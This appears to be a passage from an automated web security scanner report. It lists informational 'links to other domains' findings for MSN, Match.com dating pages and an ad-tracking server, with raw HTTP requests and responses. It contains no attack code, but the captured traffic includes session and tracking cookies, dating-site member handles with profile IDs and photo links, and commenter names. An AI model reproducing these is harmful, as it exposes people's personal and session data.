<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<a href="http://dating.msn.com/index.aspx?lid=2&amp;ird=1"><img src="http://images.match.com/match/presentations/nonemoreblack/header/13163_matchLogo.gif" alt="match.com" style="border-width:0px;" /></a>
...[SNIP]...
<div class="close modal_dismiss">
    <img id="ctl00_matchHeader_ctl00_Image10" alt="Close" src="http://images.match.com/match/doubleblind/xCloseModal.gif" style="height:16px;width:16px;border-width:0px;" />
    </div>
...[SNIP]...
<a id="ctl00_matchHeader_ctl00_HyperLink6" href="http://dating.msn.com/subscribe/subscribe.aspx?lid=1"><img id="ctl00_matchHeader_ctl00_Image5" src="http://images.match.com/match/presentations/nonemoreblack/header/13272_subscribe_fin_becauseofyou.gif" style="border-width:0px;" />
                   <!-- Start //WI: 9402: blue "Subscribe Today" banner 100% on the sharkin : SM -09/11 -->
...[SNIP]...
<a id="ctl00_matchHeader_ctl00_Hyperlink13" class="iGuideFin" href="/cp.aspx?cpp=/en-us/match/whitneycasey/video.html&amp;linkid=1"><img id="ctl00_matchHeader_ctl00_Image7" src="http://images.match.com/match/presentations/nonemoreblack/header/15446_tipsFin.gif" alt="Rev Up Your love Life With These Tips!" style="border-width:0px;" /></a>
...[SNIP]...
</div>
   <img alt="Search Now" border="0" class="btnQuickSearch" src="http://images.match.com/match/search/redesign/quickSearchBtn.gif" style="height:29px;width:132px;border-width:0px;" />
   <input type="hidden" name="cl" value="1" id="cl" />
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl01_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=KNKgii37jVuMmBwd0i%2f2Mg%3d%3d&amp;Handle=kimmiladyGL&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl01_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/89/43/98858943A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl02_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=fNn9hWjz1coJYdl82sNKIg%3d%3d&amp;Handle=loyolachick24&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl02_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/29/54/98852954A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl03_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=2QvKnCQePh2YL7spzYHpMw%3d%3d&amp;Handle=prettybrown6514&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl03_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/28/80/98852880A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl04_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=sKapGwP7SgLicPRUAIMs6Q%3d%3d&amp;Handle=luvbeingme2&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl04_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/99/22/98849922A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl05_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=fbDSMvL7KUGCDdmgPzF%2ftQ%3d%3d&amp;Handle=sky0469&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl05_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/90/83/98849083A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
"ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl06_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=0%2f8FXKF47rYJEeu8x2glLg%3d%3d&amp;Handle=missharris6844&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl06_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/79/71/98847971A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
"ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl07_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=lpU3C9vOjwQWrsOAbi0fdQ%3d%3d&amp;Handle=cherrycherrybmbm&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl07_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/76/04/98847604A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl08_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=rvHvaPQREhlIcO%2bfl5BktA%3d%3d&amp;Handle=Estele28&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl08_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/52/71/98845271D.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl09_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=To5O9do3gG2BgTqeIqEU%2fg%3d%3d&amp;Handle=klewi012&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl09_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/47/20/98844720A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl10_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=SEaQRW2tzNuwmw8kJBjzsA%3d%3d&amp;Handle=tiffybaby28&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl10_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/24/63/98842463A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl11_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=0scUu11zS9macPrjNDd3qQ%3d%3d&amp;Handle=Settling9263&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl11_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/21/31/98842131A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl12_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=uMW5sORSOB67p5JZLou4VA%3d%3d&amp;Handle=jgrzeca&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl12_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/11/74/98841174A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
"ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl13_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=7D%2b6gjvfWQ%2biJcJx0ytfbQ%3d%3d&amp;Handle=Lyricbarbara&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl13_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/95/49/98839549A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl14_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=eLneijRrpeUiuYPkIUXBJA%3d%3d&amp;Handle=f_lili&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl14_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/84/71/98838471A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl15_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=95kxt2PQIQ%2bC89uLmHGyfQ%3d%3d&amp;Handle=bekz312&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl15_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/36/31/98833631A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
"ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl16_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=UnLi9IxsnO2HrDxRPYlUeA%3d%3d&amp;Handle=ClassyGuidette4u&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl16_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/32/16/98833216A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl17_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=%2f8nGSsbxUFEuSC44KiAk6g%3d%3d&amp;Handle=TruthfulTiffany&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl17_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/89/82/98828982B.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl18_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=XGwlKn%2b7KDm2Rwqq75a0Qw%3d%3d&amp;Handle=Harp81218&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl18_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/70/43/98827043C.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl19_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=VVRm%2foOZQTaMQooNr%2bK0mA%3d%3d&amp;Handle=ezbreezycaligirl&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl19_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/81/70/98528170A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl20_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=NRV8ReKlH%2b%2bDuYquUFhAbw%3d%3d&amp;Handle=kne413&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl20_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/48/79/98524879A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl21_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=VV6atycnKtVj%2f0DUpoRqMA%3d%3d&amp;Handle=missannabella10&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl21_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/28/25/98452825A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
"ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl22_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=O3jZyTlHhw3nqW3capqvuw%3d%3d&amp;Handle=LivinMyAdventure&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl22_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/89/08/96658908A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
"ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl23_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=S6v5LNyVojgGO4n9DBYF9A%3d%3d&amp;Handle=smilebrendasucce&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl23_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/79/51/96637951A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl24_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=H7Vrj1WCxfcwDlfT0j2%2fIA%3d%3d&amp;Handle=MzSincere22&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl24_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/11/08/94411108A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
l00$userName$ctl00$txtUserNameSearch" type="text" value="enter username here" maxlength="75" id="ctl00_workarea_mySearchIndex_ctl00_userName_ctl00_txtUserNameSearch" class="userSearch watermarkOn" />
<img id="ctl00_workarea_mySearchIndex_ctl00_userName_ctl00_Image1" class="goBtn" alt="Go" src="http://images.match.com/match/search/v2/goBtn.gif" style="height:26px;width:36px;border-width:0px;" />
       </div>
...[SNIP]...
<li><a href="http://match.mediaroom.com?lid=4">Media Room</a>
...[SNIP]...
<li><a href="http://success.match.com/index.aspx?lid=4">Success Stories</a>
...[SNIP]...
<a id="ctl00_matchFooter_ctl00_HyperLink1" href="/cp/social/r/officialblog.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image1" title="Check out our blog" src="http://images.match.com/match/footer/ico_blg.gif" alt="Check out or blog" style="border-width:0px;" /></a>
            <a id="ctl00_matchFooter_ctl00_HyperLink2" href="/cp/social/r/facebook.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image2" title="Like us on facebook" src="http://images.match.com/match/footer/ico_fb.gif" alt="Like Us on Facebook" style="border-width:0px;" /></a>
            <a id="ctl00_matchFooter_ctl00_HyperLink3" href="/cp/social/r/twitter.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image3" title="Follow us on twitter" src="http://images.match.com/match/footer/ico_twtr.gif" alt="Follow Us on Twitter" style="border-width:0px;" /></a>
...[SNIP]...
<li><a href="http://www.domania.com/">Domania</a>
...[SNIP]...
<li><a href="http://www.expedia.com/">Expedia</a>
...[SNIP]...
<li><a href="http://www.getsmart.com/">GetSmart</a>
...[SNIP]...
<li><a href="http://www.hotels.com/">Hotels</a>
...[SNIP]...
<li><a href="http://www.hotwire.com/">Hotwire</a>
...[SNIP]...
<li><a href="http://www.livenation.com/">Live Nation</a>
...[SNIP]...
<li><a href="http://www.ticketmaster.com/">Ticketmaster</a>
...[SNIP]...
<li class="plLast"><a href="http://www.match.com/">Online Dating</a>
...[SNIP]...

22.71. http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1860849269@x23

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /2/B3DM/2010DM/1860849269@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; session=1296350849|1296350983

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:29:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 171
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

<!-- Segment Pixel ... Farmers_Brand_Exposed - DO NOT MODIFY -->
<img src="http://ib.adnxs.com/seg?add=81825&t=2" width="1" height="1" />
<!-- End of Segment Pixel -->

22.72. http://editorial.autos.redacted/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://editorial.autos.redacted
Path:   /article.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /article.aspx?cp-documentid=1167044&icid=autos_0252&GT1=22017 HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:08 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=b2ef7ad8883e47ad8f65e6301704c832; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=367C6313EA264C81A9D2BCFF5336B69D; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:08 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 92416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=A0">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344768&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Feditorial.autos.msn.com%2Farticle.aspx%3Fcp-documentid%3D1167044%26icid%3Dautos_0252%26GT1%3D22017&amp;lc=1033&amp;id=72801" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=Ford+2010+profit+highest&amp;form=MSNS06">ford highest profit</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=GM+green+loan&amp;form=MSNS06">GM 'green' loan</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=GM+Volt+sales+year%27s+end&amp;form=MSNS06">volt sales</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=south+korea+kia+net+profit&amp;form=MSNS06">kia motors hits record</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<p>What would you say if we told you the <a href="http://www.bing.com/search?q=best+engine&amp;src=IE-SearchBox&amp;FORM=A0" onclick="window.open(this.href);return false;">best engine</a>
...[SNIP]...
</a> is revamping the F-150's entire engine lineup for 2011, adding, among others, a twin-turbocharged 3.5-liter EcoBoost V6. It bests the two available V8s for <a href="http://www.bing.com/search?q=fuel+economy&amp;src=IE-SearchBox&amp;FORM=A0" onclick="window.open(this.href);return false;">fuel economy</a>
...[SNIP]...
<p><a href="http://www.bing.com/images/search?q=2011+Ford+F-150&amp;qpvt=2011+Ford+F-150&amp;FORM=A0#" onclick="window.open(this.href);return false;"><strong>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XyiDak0zPyY8ZrhokyR9iNRRhd1GC66Nd?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-ddc24ec5a662d8e6.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Clint Crawford
..(GrayWolf1946)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-ddc24ec5a662d8e6.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XAdPV_rwmgnp98hdC1XRlJrzIAq49WyXf?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XAdPV_rwmgnp98hdC1XRlJrzIAq49WyXf?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XyiDak0zPyY8ZrhokyR9iNRRhd1GC66Nd?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X-26Ie0m2cta3FE_xU06GFh0E9RViXzB0?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-bfdd1d012ec983ba.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">scott
..(sg455parts)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-bfdd1d012ec983ba.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XrgRkjgnLOw0ZYfTyEirpPmnkXYWmoIl-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XgSkN-d-sZqV75UtUQscq2BVmyTobSPrz?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XgEfIOLeyjEgLRqgrRf7RWktCKeayYalf?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XyEaFNhDro1L95eJJ2hH_mmQglTGGluZW?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGl3H5Klglx76IvNFpR88GO8xYhCSxjpt?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XnQHep8tHn2f33Vnxdc3hdCb-gr_uhB-z?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XPZrpIw_sk8OSJiv6rRLBq-ViZNF08yCu?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-c7c240ed082eead0.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Brad Hardy
..(american strong)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-c7c240ed082eead0.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XPZrpIw_sk8OSJiv6rRLBq-ViZNF08yCu?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
